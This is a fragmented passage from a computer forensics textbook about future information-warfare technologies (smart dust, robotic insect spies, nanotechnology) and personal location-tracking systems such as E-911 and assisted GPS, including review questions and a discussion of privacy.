of people with this deterrent
...
It’s
pretty nasty stuff
...

Many tools that let hackers carry out surveillance are now Web-based
...
No complicated downloads or zip files
...
Although a talented few among hackers actually
make attack tools, many of these tools today are freeware and they’re posted on
dozens of techie sites, not the secret underground
...

In the wrong hands this tool is dangerous, but that version isn’t as dangerous as
other versions that will be released
...
Serbian forces were sowing terror across Kosovo
...
Errant NATO
bombs had killed dozens of civilians and shaken support for the alliance
...
A Colorado outfit, called Space Imaging, was
about to launch a picture-taking satellite with clarity nearly as good as that of U
...

spy satellites
...
That had to be stopped
...
The U
...
-licensed firm
could simply be ordered not to take pictures over a broad swath of Europe
...
In the

532

Computer Forensics, Second Edition

end, however, no order was issued
...

Fortune may not be so kind next time
...
Several other companies are right behind it
...
There’s a new proliferation of space-based capabilities
...

That’s pushing the Pentagon into a whole new kind of warfare
...
S
...
That’s a nice way of saying the Pentagon needs to be prepared
to defend the ultimate high ground by attacking hostile satellites
...
It must also come up with plans for deploying
space-based lasers or other weapons that could be used against targets anywhere on
Earth or above it
...

Aggressive “space control,” as the military calls its quest for dominance in the
sky, could backfire
...
Developing space weapons would be a mistake
of historic proportions that would trigger an arms race in space
...
S
...
In Pentagon war games, just trying to
defend U
...
satellites causes problems
...
The activity ends up being the problem and not the solution
...
Let’s look first at spies the size of a mote of dust
...

Spy Dust Balls
“If only these walls could talk” may not be an idle plea much longer
...
Thousands of these gossipy particles, each a tiny
bundle of electronic brains, laser communications system, power supply, sensors,
and even a propulsion system, could lurk all around, almost undetectable
...


A DUSTY FUTURE
Scientists recently set up a network of small, wireless sensors called motes that detect
birds as well as measure temperature, humidity, and barometric pressure
...
You can literally be anywhere in the world and
know what’s going on
...
Just as MRI technology revolutionized the ability to peer inside the body, the new networks are expected to shed much-needed
light on planetary problems like climate change and how pollutants move through
the environment
...

However, while smart dust is generating excitement, some people already are
concerned about the dark side of what will undoubtedly be its expanded presence on
the landscape
...

Sensors and computer chips have long been embedded in consumer products,
whether cars or refrigerators
...
Before the technology takes off, motes may have to get smaller—currently, prototypes are the size of matchboxes
...
These networks of tiny communicating computers could even function as a new kind of Internet that, by merging
with the physical world, would allow us to query almost anything—buildings, roads,
rivers—for information
...
, got funding from
the DoD’s Defense Advanced Research Projects Agency (DARPA) to develop tiny,
intelligent sensing devices
...
The initial challenge was
to miniaturize the components, including the sensors, radio transmitters, batteries,
and computer hardware
...
Recently, scientists solved this problem by designing software that enabled the motes to sleep most of the time, yet wake
up regularly to take readings and communicate
...

Indeed, an early test in March 2001 showed just how independent the devices
could be
...
As soon as they hit the ground, they
organized themselves into a network and began sensing the magnetic field around
them
...

Now, several companies make prototypes with customized sensors that are
showing great promise in field tests
...
In addition to eliminating miles of airing (moving
out) and reducing the cost of the experiments 10-fold, the motes will give scientists
the first 3-D view of the redwood forest microclimate
...
Their goal is to better understand how the loss and fragmentation of redwood forests affect local climate and
water resources
...

Motes are poised to become practical tools for protecting and managing all sorts
of resources
...
In 2003, a vineyard in British
Columbia deployed a network of 65 motes to closely track temperature fluctuations
on its slopes
...

While the applications of wireless sensor networks seem endless, the first field
tests have revealed shortcomings, which companies are working hard to address
...
At times the radios have been as fickle as
cell phones in their signaling and reception
...
For instance, the Embedded Collaborative Computing Area at the
Palo Alto Research Center in California, is trying to reduce the volume of incoming
data by training the motes to pay attention only to what’s important in the surrounding environment
...


The Information Warfare Arsenal of the Future

535

As motes are deployed more and more widely, the potential for the misuse of the
information they collect can only grow
...
Scientists don’t think it will be difficult to draw the lines, but they do need to ask, How far do we let this go? It’s a question far removed from observing seabirds on a wind-swept island
...
The idea is to build complex
gadgets so small one needs a microscope to see the parts, using fabrication methods
invented by the electronics industry for making silicon chips
...
Miniaturizing
them is well within current technology
...
Climate-control
systems in buildings would know exactly where it is too cold, humid, hot, or drafty
...
Eventually, you could log on to
readings from smart dust almost anywhere
...
NASA could scatter smart dust sensors into the Martian atmosphere and they’d settle all over the planet (like in the recent movie Red Planet)
...
In 1992, as a new associate professor at the
University of California-Los Angeles, Pister attended a Rand Corp
...
The topic was miniaturization of novel
battlefield surveillance methods
...
You could find out, for example, if a tank had gone by or whether there
was anthrax in the air
...

Poppy Seeds

Pister coined the label smart dust in 1996 and produced the first complete smartdust particle in mid-2002, about 1 millimeter on a side, or roughly between a poppy

536

Computer Forensics, Second Edition

seed and a grape seed in size
...
Before building the first fully small versions, however,
the team wants to be sure it can get oversize prototypes to work
...
Another student is designing a solid rocket micromotor, visible with a good magnifying glass, carved out of
silicon
...
Some smart dust may be equipped with solar cells for power
...
Sensors, at
first, would be simple (such as for temperature, humidity, a few targeted chemicals,
etc
...

Pister tells the grad students and postdocs in the engineering school’s smart
dust group that above all, they must have a passion for new ideas and teamwork
...
Love of freely flowing communication is appropriate from a man
who expects a tomorrow suffused with tiny snoops
...
His reply to nervous objections is simple
...
” Well, maybe
...
It
is an advantage that has proved difficult to attain: spies, satellites, and U-2s have all
failed to keep commanders from blundering into ambushes and mismatches
...
It’s having the sense that somebody’s out there trying to get you but having no idea of where the enemy might be
...
The researchers envision tomorrow’s soldiers coming to a hill,
halting, and reaching into their packs for cigar-shaped tubes
...

Equipped with cameras or acoustic sensors, the mechanical insects range forward
and provide data on the hazards that lie in wait on the other side: the number of
machine gun nests and the position of artillery
...
7 million from DARPA, military researchers are designing such
insect-inspired spies
...
Insect-shaped “micro
aerial vehicles” are next on the slate
...

In most robotic systems today, people think that if you want to move one joint,
then you need to attach a motor at that joint
...
It also reduces robots to the ranks of expensive toys
...

In the initial design, piezoelectric ceramics—thin, ceramic-coated metal wafers
that bend when an electrical current is applied to their surfaces—were proposed
...
When charged, one
half of the actuator expands while the other contracts, causing it to curve
...
The researchers attached titanium legs to these vibrating
strips
...

Because piezoelectrics require only occasional energy boosts to keep up the vibration, the bugs promise to be up to 70% more energy efficient than traditional robots
...
The
same work could more easily be accomplished by hooking that weight to a spring on
the ceiling, then displacing it a bit and letting it bounce up and down by itself
...
The bugs’ energy efficiency should give them ranges
of almost 600 yards and allow them enough juice to carry such intelligence-oriented
payloads as chip-size infrared detectors and quarter-size video cameras
...
Most things biological sort of oscillate as they walk
...
They were also impressed by the shape of daddy
longlegs, whose low-slung bodies and inverted-V legs create a stable configuration—important for robots that will have to scamper across uneven, sometimes
treacherous terrain
...
They
probably won’t survive being stomped on, but short of that they’re pretty tough
...


538

Computer Forensics, Second Edition

Before the bugs can be unleashed on the battlefield, however, a few major hurdles
remain
...
To get the bugs moving without the aid of chargers, circuitry must be developed to amplify the current, and it must be small enough to fit the 2-by-3/4-inch
bugs
...

Another lingering question is how a robotic swarm can be controlled
...
In the event of the mother ship’s destruction, the leadership role could be shifted to a surviving robot
...

DARPA officials and the researchers are optimistic that the kinks can be worked
out and that assembly-line production of the bugs is nearing
...
Once all design issues are resolved, the researchers believe, the insects could cost as little as $7 per unit
...

The low price makes the insects potential candidates for a variety of uses, including delivering lethal toxins on the battlefield or aiding police SWAT teams
...
Those missions are far distant,
though; the bugs’ first and foremost duty will be to give American troops an upper
hand and to save them from stumbling into situations too perilous to survive
...


NANOTECHNOLOGY
In 2000, a group of scientists from the University of Michigan’s Center for Biologic
Nanotechnology traveled to the U
...
Army’s Dugway Proving Ground in Utah
...
” These munitions don’t exactly go “Kaboom!” They’re molecular-size droplets, roughly 1/5,000
the head of a pin, designed to blow up various microscopic enemies of mankind, including the spores containing the deadly biological warfare agent anthrax
...
In the test, the devices
achieved a remarkable 100% success rate, proving their unrivaled effectiveness as
a potential defense against anthrax attacks
...
For example, just by adjusting the bombs’ ratio of soybean oil, solvents,
detergents, and water, researchers can program them to kill the bugs that cause influenza and herpes
...
coli, salmonella, or listeria before they
can reach the intestine
...
Over the past 23 years, scores of novels and movies have explored the implications of mankind’s learning to build devices the size of molecules
...
R
...

Since 1999, a series of breakthroughs have transformed nanotech from sci-fi
fantasy into a real-world applied science and, in the process, inspired huge investments by business, academia, and government
...

Silicon Fingers
Meanwhile, nearly every week, corporate and academic labs report advances in
nanotech with broad commercial and medical implications
...
Within a decade or so,
such devices may be able to track down and destroy cancer cells
...
” In tests announced in 2003, the machine’s rotor spun for 120 minutes at 6 to 7
revolutions per second
...

These inventions and products are just the beginning of what many observers
predict will be a new industrial revolution fostered by man’s growing prowess at
manipulating matter one atom, or molecule, at a time
...

Nanotech takes its name from the nanometer, a unit of measurement just one billionth of a meter long
...
Materials with 10 times the strength of steel and only
a small fraction of the weight
...
Or detecting cancerous tumors
when they are only a few cells in size
...
Such feats include imitating the workings of the body, where DNA not only programs cells to replicate
themselves but also instructs them how to assemble individual molecules into new
materials such as hair or milk
...

Atom by Atom
The inspiration for nanotech goes back to a 1959 speech by the late physicist Richard
Feynman, titled “There’s Plenty of Room at the Bottom
...
Starting in the Stone Age, all human technology, from sharpening
arrowheads to etching silicon chips, has involved whittling or fusing billions of
atoms at a time into useful forms
...

Four decades later, Chad Mirkin, a chemistry professor at Northwestern University’s $45-million nanotech center, used a nanoscale device to etch most of Feynman’s speech onto a surface the size of about 10 tobacco smoke particles—a feat
that Feynman would no doubt have taken as vindication
...
Nor has it been
lacking in controversy
...
In
2000, the chief scientist at Sun Microsystems created a stir when he warned that in
the wrong hands, nanotech could be more destructive than nuclear weapons
...

Most researchers in the field don’t share that type of concern
...
Researchers are knocking on the door of creating new living
things, new hybrids of robotics and biology
...

The early payoffs have already arrived
...
Another familiar product, Dr
...
Nanoparticles also help make car and
floor waxes that are harder and more durable and eyeglasses that are less likely to
scratch
...

What accounts for the sudden acceleration of nanotechnology? A key breakthrough came in 1990, when researchers at IBM’s Almaden Research Center succeeded
in rearranging individual atoms at will
...
The entire logo measured less than three nanometers
...
Using a tool known as a molecular beam epitaxy, scientists
have learned to create ultrafine films of specialized crystals, built up one molecular
layer at a time
...

One quality of such films, which are known as giant magnetoresistant materials, or GMRs, is that their electrical resistance changes drastically in the presence of
a magnetic field
...
In a few years, scientists are
expected to produce memory chips built out of GMR material that can preserve 100
megabits of data without using electricity
...

Natural Motion
The next stage in the development of nanotechnology borrows a page from nature
...
Living cells contain all sorts of nanoscale motors made of proteins that
perform myriad mechanical and chemical functions, from muscle contraction to
photosynthesis
...

Animals such as the abalone, for example, have cellular motors that combine
the crumbly substance found in schoolroom chalk with a “mortar” of proteins and
carbohydrates to create elaborate, nano-structured shells so strong they can’t be
shattered by a hammer
...

How are these biologically inspired machines constructed? Often, they construct themselves, manifesting a phenomenon of nature known as self-assembly
...
For example, the two strands that make up DNA’s
double helix match each other exactly, which means that if they are separated in a
complex chemical mixture, they are still able to find each other easily
...

For instance, in 1999, a team of German scientists attached building materials such
as gold spheres to individual strands of DNA and then watched as the strands found
each other and bound together the components they carried, creating a wholly new
material
...
Scientists expect that when they succeed in
weaving nanotubes into larger strands, the resulting material will be 100 times
stronger than steel, conduct electricity better than copper, and conduct heat better
than diamond
...

In 2000, a team of IBM scientists announced that they had used self-assembly
principles to create a new class of magnetic materials that could one day allow computer hard disks and other data-storage systems to store more than 100 times more
data than today’s products
...

Other scientists have discovered important new self-assembling entities by accident
...
” He saw the potential right away
...
Soon afterward, Stupp discovered, again accidentally, that he could easily program these supramolecules to form film that behaves
like Scotch tape
...
Eventually, the researchers hope to
build memory chips smaller than a bacterium
...
This is because the more densely packed the transistors on a chip
become, the faster it can process, and we are approaching the natural limit to how
small transistors can be fabricated out of silicon
...
Swarms of programmable particles, sometimes referred to as “utility fog,” will assemble themselves on
command
...

Meanwhile, new, superstrong, lightweight nanomaterials could make space
travel cheap and easy and maybe even worth the bother, if, as some scientists predict, nanotech can be used to create an Earth-like atmosphere on Mars
...
It all seems hard to imagine, yet nanotech has already produced enough
small wonders to make such big ideas seem plausible, if not alarming—at least to
the high priests of science and the IW military strategists
...
Technology has already been used effectively by U
...
forces in the Gulf War, in Iraq and
in the conflict in Haiti
...
Those countries most capable of waging it are also the ones most vulnerable to it
...

Conclusions
Even though the anticipated national security threats of the coming decades involve less-developed countries, the Collaborative Virtual Workspace (CVW)
threat and other methods of intrusion and disruption are not necessarily beyond their reach
...

Opportunities to deceive and confuse through an elaborate misinformation
scheme along a myriad of information paths are available to anyone
...


544

Computer Forensics, Second Edition

There exists the prospect of an intelligence analyst manipulating an adversary’s
command-and-control system so that reality is distorted
...

Imagine a scenario depicting a “left hook” in the Iranian desert that fails because the systems in use were successfully attacked by CVW, or some other intrusion method, with the resulting disruption putting U
...
troops in a flailing
posture—facing the unknown and losing confidence in their operation
...
An Iranian “left hook” will be difficult to repeat
...
The IW arsenal is coming of age
...

The necessity to prevent irresponsible groups and individuals from getting access to nanotechnological manufacturing capability will be a prime concern in
the near future
...


An Agenda for Action
In the United States, where the threat is most immediately recognized, debate is
currently going on to decide what part government can and should play in protecting civilian networks
...
Government regulation would seem to be interference or even repression
...
One solution is to require organizations with a dependence on sensitive information technology to fulfill certain security criteria before being issued a government license
...

The U
...
government needs to set an agenda for action that goes beyond the
work already done in preparation for defending against the IW arsenal of the future
...
1 in Appendix F
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Even though the anticipated national security threats of the coming decades involve less-developed countries, the CVW threat and other methods of intrusion and disruption are necessarily beyond their reach
...
True or False? Opportunities to deceive and confuse through an elaborate misinformation scheme along a myriad of information paths are not available to
anyone
...
True or False? The IW arsenal of the future provides an old avenue to employ
deception techniques through the use of multiple paths that create the perception and validation of truth
...
True or False? Tomorrow’s soldier will depend more than ever on the very
well-known and trusted factors of mobility
...
True or False? One can assume that Iran, and others, will exploit the GPS to
their own advantage
...
Among the current possible offensive weapons are the following, except:
A
...
Nuclear bombs, another type of virus which can lie dormant for years,
until, upon receiving a particular signal, would wake up and begin attacking the host system
C
...
Worms, whose purpose is to self-replicate ad infinitum, thus eating up a
system’s resources
E
...
The Privacy Foundation at the University of Denver conducts research into
communications technologies and provides the public with tools to maintain
privacy in the Information Age
...
The report cites the following possible uses for
this security breach, except:

546

Computer Forensics, Second Edition

A
...

B
...

C
...

D
...

3
...
Open source intelligence
B
...
Displays
D
...
The electromagnetic device will be detonated by the missile’s onboard fusing
system
...
Navigation system
B
...
Internet protocol
D
...
Air-to-air missile, the proximity fusing system
5
...
The near future
B
...
Traditional psychological operations or deception operations
D
...
Clandestine human intelligence operations or overt research operations
Exercise
In a breach of contract case it was decided on a Friday to use a computer forensics
specialist (CFS) to recover company emails
...
Over 1,090,000 total emails met the criteria
...
How was the CFS able to go about recovering the email?

The Information Warfare Arsenal of the Future

547

HANDS-ON PROJECTS
An examiner at a major financial institution in Chicago successfully previewed two
drives in Asia connected to the company-wide area network
...
The preview process revealed that
one of the drives contained highly relevant information and the drive was promptly
acquired for further forensic analysis in Chicago
...
How did the CFS go about conducting the investigation?
Optional Team Case Project
Law enforcement investigators arrived at a company site to collect computer evidence from a server
...
How was the CFS able to go about
conducting the investigation?

REFERENCES
[1] Vacca, John R
...
, Prentice Hall, New York,
2001
...
, i-mode Crash Course, McGraw-Hill, New York, 2002
...
, Satellite Encryption, Academic Press, New York, 1999
...
, The World’s 20 Greatest Unsolved Problems, Prentice Hall,
New York, 2004
...
K
...


This page intentionally left blank

18

Surveillance Tools for
Information Warfare
of the Future

ireless systems [1] capable of monitoring vehicles and people all over the
planet (basically everything) are leaving businesses and the military
aglow with new possibilities—and some privacy advocates deeply concerned
...
Scientists have developed a chip that can be inserted
beneath the skin, so that a person’s location can be pinpointed anywhere
...
When he
signed up for this service, he told his guys, “Big Brother’s keeping an eye on you,
and I’m Big Brother
...

These technologies have become one of the fastest-growing areas of the wireless
communications industry
...


W

MONITORING EVERYTHING
A federal effort to make it easier to pinpoint the location of people making emergency 911 calls from mobile phones means that cell phones sold in the United
States are now equipped with advanced wireless tracking technology
...
One Florida company wants to provide parents with wireless watchbands that they can use to keep
track of their children
...
By allowing location-based services to proliferate, you’re opening the door to a new realm of privacy abuses
...

Until recently, location-based services belonged more in the realm of science
fiction than commerce
...
GPS uses satellite
signals to determine geographic coordinates that indicate where the person with the
receiving device is situated
...

Real-life improvements in the technology have come largely from research initiatives by start-up companies in the United States, Canada, and Europe as well as
from large companies like IBM, which recently formed a “pervasive computing” division to focus on wireless technologies such as location-based services
...
It’s no surprise that a
whole new ecology of small companies has formed to focus on making it all more
precise
...
After all, he reasoned, wouldn’t the whereabouts of an Alzheimer’s patient
be important to relatives? Wouldn’t the government want to keep track of paroled
convicts? Wouldn’t parents want to know where their children are at 10 P
...
, 11
P
...
, or any hour of the day?
A review of Digital Angel’s commercial potential, though, revealed concern
over the possibility of privacy abuses [3]
...
Embedding technology in people is too
controversial, but that doesn’t mean a system capable of tracking people wherever
they go won’t have great value
...

That Professor Zhou found himself in the middle of the privacy debate is no
surprise, given the growing interest in location-based services
...

Some of the world’s largest wireless carriers, such as Verizon Wireless, Vodafone
of Britain, and NTT DoCoMo of Japan, are promoting the technology, in addition
to dozens of small companies in the United States and Europe
...
Meanwhile Cell-Loc Inc
...

Some companies are even more ambitious
...

While businesses around the world seek to improve the quality of location-based
services, the biggest impetus behind the advancement of the technology has come
from the federal government, through its effort to improve the precision of locating
wireless 911 emergency calls
...

With the number of wireless users growing, carriers are now equipping either
cell phones or their communications networks with technology that would allow
authorities to determine the location of most callers to within 600 feet, compared
with current systems that can locate them within about 900 feet
...
Supporters of the initiative, called “E-911” for
“enhanced 911,” expect the technology’s precision to be even better than the federally mandated 600-foot radius
...
Although the E-911 initiative has driven wireless carriers in the United
States to improve their location technology, industry groups have started to grapple with privacy issues
...
The association
will endorse companies that adhere to the policy
...
They need to be assured that there is no conspiracy to use this information in an underhanded way
...
Scarfo, the son of Philadelphia’s former mob boss, was almost paranoid enough
...
FBI agents sneaked into
Scarfo’s office in Belleville, New Jersey, on May 10, 1999, and installed a keyboardsniffing device to record his password when he typed it in
...
The case, which
is still awaiting trial, appears to be the first in which the U
...
government used such
aggressive surveillance techniques during an investigation; some legal observers say
the FBI’s breaking-and-entering procedures go too far
...

Scarfo’s prosecution comes at a time when the FBI’s Carnivore surveillance system (discussed in Chapter 17) is under increasingly heavy fire from privacy groups,
and the use of data-scrambling encryption products appears to be growing
...

Scarfo has been charged with supervising an illegal gambling business in violation
of state and federal law and using extortionate loan shark tactics, according to a threecount indictment filed in federal court in June 2000
...

The elder Scarfo, who once ran the Philadelphia mob that also dominated the
Atlantic City gambling racket, was imprisoned in 1991 on racketeering charges
...

The idea first publicly surfaced in mid-1999, when the Justice Department proposed legislation that would let police obtain surreptitious warrants and “postpone” notifying the person whose property they entered for 30 days
...
In the final draft of the Cyberspace Electronic Security Act submitted to Congress, the secret-search portions had disappeared
...
When criminals such as drug dealers and terrorists use encryption to conceal
their communications, law enforcement must be able to respond in a manner that
will not thwart an investigation or tip off a suspect
...
A related “secret search” proposal resurfaced in May 2000 in a Senate bankruptcy bill
...
Scarfo’s computer by recording the key-related information as it is entered
...
With the PGP private
key and Scarfo’s secret password, the government could then view whatever documents or files he had encrypted and stored on his computer
...
S
...
Donald Haneke granted the FBI’s request
...
The interesting issue is
that in those (court) documents the FBI specifically disclaim any reliance on the wiretap statute
...

If the government is now talking about expanding black bag jobs to every case
in which it has an interest and where the subject is using a computer and encryption, the number of break-ins is going to skyrocket
...

However, the government could successfully argue that break-ins are constitutional
...
In many respects, it’s no different from a wiretap
...
The FBI’s got everything that
Scarfo typed on that keyboard (a letter to his lawyer, personal and medical records,
legitimate business records, etc
...
The next part of the chapter will take a close look at these information
warfare (IW) tracking devices
...
M
...
Her 74-year-old husband, who suffers from dementia, had left four hours

554

Computer Forensics, Second Edition

earlier and had not yet returned
...
Within a minute, the provider
found him on the second floor of a department store, simply by paging a miniature
locator device secured to the man’s clothes
...
Fortunately, the service provider continued tracking the elderly man and was able to direct the son to
the fourth floor of an Osaka hotel
...
M
...
Locus
Corp
...

The belief that it should be easy to find anyone, anywhere, at any time with a
few pushes of a button has caught on with the advent of the GPS
...
Add the highly practical need to find missing persons promptly,
and the personal locator system (PLS) industry is born
...
Some are already being deployed in Japan
...
Several companies looking into the technology options plan to offer
a broad array of services to the public and to businesses
...
Initially designed to support the mentally handicapped, personal locator
services have expanded to serve children, the elderly, tourist groups, and security
patrols, as well
...
Not surprisingly, service areas coincide with wireless infrastructure deployments, which personal locators have exploited since their beginning in 1998
...
One is the need to effectively monitor offenders on parole and
probation
...
The other
is the wish to provide wireless callers with enhanced 911 (E-911) emergency services
...
Callers using
cellular phones could be anywhere and unlocatable, unless location technology
were applied to the wireless telephone system
...
Unlike vehicular locators, which
are less constrained by size and power, locators borne on the person have to be the
size of a pager, and their power output has to be less than 1 W, because they can
only carry a small battery that cannot be continuously recharged
...


Surveillance Tools for Information Warfare of the Future

555

One PLS Architecture
A PLS is likely to involve a service provider, a location center, and a wireless network
...
The person bearing a locator device is either being sought by a subscriber
to the service, is seeking help from the subscriber, or, as in the case of a parolee, is
having his or her whereabouts monitored continuously
...
It is representative of the first scenario, based on the paging mode, wherein
the person with the locator device is sought
...
The operator enters the ID into a computer,
which transmits it to another computer at the location center
...
Immediately
the office forwards the call to the wireless base station nearest the locator
...
The locator replies, and from those inputs, plus RF database information
on the base stations, the center computes the locator’s coordinates
...

These coordinates are transmitted to the service provider’s computer, which
displays the missing person’s position on a street map for the service operator to report to the subscriber
...

In a second scenario, involving the emergency mode, the user of the locator is
lost or in dire straits of one sort or another and presses the device’s panic button
...

The system can employ either packet data or voice channel communications
...

If a voice channel is used, the wait could last up to 33 seconds because of processing differences between the two channel types
...
Such a human interface may be necessary given the complexity of Japanese (as explained in the Japanese example earlier) city-addressing
schemes
...


556

Computer Forensics, Second Edition

Both the emergency and paging operating modes of PLSs are characterized as
intermittent
...
Strictly speaking, the polling is periodic rather than
continuous, but the latter term is more common
...
If it were implemented
with a continuous voice call between the system and the locator, the expense would
be beyond the reach of most applications
...
59 a day—and also drain
the locator battery within a few hours
...
In the packet version, the locator is likely to be polled every few minutes, exchanging 100 bytes or so with the system in a fraction of a second
...
80
...
Another plus: upcoming third-generation mobile wireless telephony
will increase the availability of packet data communications
...
Among the most common methods
are angle and time difference of the signal’s arrival, GPS and the more recent assisted GPS, enhanced signal strength, and location fingerprinting
...
This can be done by pointing a directional
antenna along the line of maximum signal strength
...
A two-element antenna is typically used to cover
angles of ±60 degrees
...

A single mobile directional antenna can give only the bearing, not the position,
of a transmitting object
...
Such an antenna is generally used to
approach and locate objects up to several kilometers away
...
The same basic technique is used by LoJack Corp
...


Surveillance Tools for Information Warfare of the Future

557

With two directional antennas spaced well apart, however, the position of a
transmitting device in a plane can be computed
...

Angle measurement precision affects the accuracy of positioning calculations,
as does the geometry of the transmitting device and receiving antennas
...

Fortunately, multiple receiver antennas distributed throughout the area of coverage
enable the cellular system to select those antennas that introduce the smallest error
...
Given the
speed of light and known transmit and receive times, the distance between the mobile locator and receiver antenna can be calculated
...
Also, all clocks used must be synchronized, but as synchronizing the mobile locator clock is usually impractical, at least
three receiving antennas are required for the calculation
...
As with the angle of arrival method, the relative
positions of receivers and transmitter affect computational errors
...
This technique is known as forward link trilateration (FLT)
...

Global Positioning System

As previously explained, a GPS relies on a constellation of 24 satellites
...
The satellites transmit spread-spectrum signals on two frequency bands denoted L1 (1575
...
6 MHz)
...
The GPS signal is further modulated with a
data message known as the GPS navigation message
...

To acquire the satellites’ signals, the GPS receiver generates a replica of the
satellites’ pseudorandom noise codes
...
If the receiver cannot match and synchronize its
replica, the GPS signal appears to the receiver as noise
...

The accuracy of GPS position calculations depends partly on measurement accuracy and partly on satellite configuration
...
S
...
Total measurement errors are estimated
at 35 meters; without selective availability, they are reduced to 8 meters
...
If those in sight are scattered throughout the sky, the measurement error is multiplied by about 1
...
If they are clustered together, the multiplier is
5 or more
...
To
determine its position, a GPS receiver calculates its x, y, and z coordinates as well as
the time the satellite signals arrive
...
When fewer than four satellites are in
view, in areas such as city canyons, one remedy is a hybrid approach, augmenting
GPS with the land-based measurements called “forward link trilateration
...

The unobstructed line of sight to the orbiting transmitters is important
...
Moreover, a conventional GPS
receiver could take several minutes to acquire the satellite signals and, therefore,
tends to operate continuously rather than be turned on and off for each acquisition
...

Server-Assisted GPS

To combat the shortcomings of GPS, an innovative technique known as “serverassisted GPS” was introduced in 1998
...
In effect, the servers are stationary GPS receivers that enhance the mobile GPS

Surveillance Tools for Information Warfare of the Future

559

receiver’s capabilities by helping to carry their weak signals from satellites to locator
...

To ask a mobile GPS receiver for its position, the server feeds it satellite information through the radio interface
...

Within about a second, the GPS receiver collects sufficient information for geolocation computation and sends the data back to the server
...

With the assisted GPS approach, the mobile receivers conserve power by not continuously tracking the satellites’ signals
...

In addition, the assisted version of the technology attains greater accuracy
...
In other words, assisted GPS is inherently differential
GPS (DGPS), which counters some of the inaccuracy in civilian GPS service
...

In June of 2000, Lucent Technologies Inc
...

More good news in this field was announced by SiRF Technology Inc
...
In addition to providing improved GPS capability, it also offers reduced
power consumption and greater accuracy, as well as performing well at handling
weak signals
...
When timing is used, the speed of light multiplied by the time a signal takes to propagate between the two points gives the distance between them
...
However, direct line contact
seldom exists inside buildings, where signal attenuation is usually unknown and many

560

Computer Forensics, Second Edition

indirect paths between transmitter and receiver are likely
...
Multipath effects impede signal timing methods somewhat, but affect signal strength methods even more
...
In contrast, signal timing is unaffected by antenna orientation and is less sensitive to attenuation
...
Such a
system takes in three-dimensional information on the lay of the land, buildings,
elevated highways, railroads, and other obstructions and uses it to simulate the RF
signal propagation characteristics of every PHPS wireless transmitting antenna in
the area of interest
...

The position of a mobile locator is determined by getting it to measure the signal strength of preferably three to five base stations
...
The mean accuracy of the ESS is 40–50 meters
...
In subway and railroad stations, the availability of base stations makes
it possible to find an individual on a specific track
...
’s ESS method weighs only 58
grams and can operate for 16 days on a single battery charge
...
Presently, researchers in Japan are investigating how
to apply ESS technology to other wireless phone systems
...
S
...
, of San Ramon, California, relies on signal structure characteristics
...

U
...
Wireless’s proprietary RadioCamera system includes a signal signature
database of a location grid for a specific service area
...
The
system analyzes the incoming signals, compiles a unique signature for each square
in the location grid, and stores it in the database
...

To determine the position of a mobile transmitter, the RadioCamera system
matches the transmitter’s signal signature to an entry in the database
...
The system can use
data from only a single point to determine location
...

What’s PLS Good For?
In the United States, the need to provide wireless phone users with emergency 911
services has been one of the spurs to the development of location technologies
...
When the match is made, this database
provides the PSAP with the street address plus a location in a building—maybe the
floor or office of the caller handset
...

The very mobility of wireless handsets rules out a simple database relationship
between phone number and location
...

Accordingly, the U
...
Federal Communications Commission (FCC) directed
operators of wireless phone services to enable their E-911 services to locate callers
...
The first required an accuracy of several kilometers by April 1998 and the second required an accuracy of 125 meters with 0
...
Whereas the first phase needed only software changes to the
system, the second required the adoption of new location technologies
...
However, a
network-only solution would preclude the use of emerging technologies, such as assisted GPS, because that would require handset modification in addition to any network infrastructure and software changes
...

To ease the introduction of new technologies, in September 1999, the FCC
modified its original Phase II directive to permit handset-enabled solutions and
also to tighten the accuracy required
...
Upgrading all
the wireless networks will cost billions of dollars
...
Although wireless subscribers are the most likely
source of recouping the cost, the government has made no formal decisions yet
...
S
...


562

Computer Forensics, Second Edition

In an international development, a working group of the European Telecommunications Standards Institute (ETSI), based in Sophia Antipolis, France, is currently
drafting a standard for supporting location services for the Global System for Mobile
Communications (GSM)
...

Monitoring Tops Services List
Wireless E-911 just helps the individual, but monitoring the mentally impaired
and criminals could have even greater impacts on society at large
...
So will the number of elderly afflicted with
age-related mental impairments
...
S
...

Recall how personal locator technology helped a family find a mentally impaired elderly man, fortunately within 50 minutes or so
...
An automatic polling system could solve this problem by
checking whether the man was within a defined polygonal area or not—the location
service and the family would be alerted whenever the man went out of this area
...
Today it costs over $70,000 per year in the United States to care for a patient in a nursing home
...

Criminal justice is another area of social concern where personal locators could
intervene
...
In 2003, according to U
...
Department of Justice statistics, almost 8
...
S
...
In comparison, in Japan in 2003,
only 468,000 were serving prison terms while 423,000 were on parole or probation
...
First-generation monitoring systems, introduced in the mid-1980s, track the location of the offender in a very confined area, such as the home
...
M
...
M
...

Second-generation monitoring systems do better
...
The newer system compares the actual with the supposed positions of
the offender, as stored in a database
...

The goal is to verify that parolees and probationers comply with the directives
imposed by the corrections system as to where and when they should and should not
be by day and night
...

Storage of the offender’s ongoing whereabouts in an electronic file benefits law
enforcement agencies in other ways [6]
...

Privacy, Security Still Issues
Confidentiality of information about a person’s whereabouts is a serious concern
for location technology
...

Lax security could lead to serious abuse of this data
...
Moreover, it can have real-time implications
...

The location information stored in databases needs to be secured, as does the
tracking and locating process itself
...
To reduce this risk, location information can be encrypted
or transmitted using coded signals employing such spread-spectrum technology as
CDMA
...
For example, in
GPS or the ESS method, the location system uses information captured and transmitted by the locator
...
In network-based
locator systems that measure the locator’s signal characteristics without requiring
its cooperation, the only safe way for users to keep their locations secret is to turn
off the device
...
In addition, hybrid systems may be required to provide improved coverage and open the door to new applications
...
The concern over how to pay for E-911 services demonstrates the need for cost reduction
...
The new location technologies, as well as wireless data packet services that are now emerging around the
globe, offer opportunities for entrepreneurs to expand personal locator services
...
net (http://www
...
net), based in Seattle, Washington,
began to provide location-based services employing the ReFLEX two-way paging
wireless infrastructure
...
The two-way paging systems using ReFLEX, developed
by Motorola Inc
...
S
...
The
Loc8
...

Recent advances such as assisted GPS are likely to enhance GPS-based offendermonitoring systems, reducing device size and power consumption, adding to accuracy, and offering new capabilities such as in-building tracking
...
Equipping young children with
personal locators may offer parents greater peace of mind
...

Personal locators could also be helpful to medical patients where the locator
would be combined with a detector that monitors the patient’s vital signs
...
Such a service could offer a patient
greater freedom and a shorter stay in hospital or nursing home
...

Obviously, technical and commercial considerations will determine the success
of the technology
...


THE IMPLICATIONS OF COOKIES AND INTEGRATED PLATFORMS
Cookies have benefits and drawbacks
...
Used carelessly, they can poison a user’s impression of a
site and even prompt some users to stay away forever
...
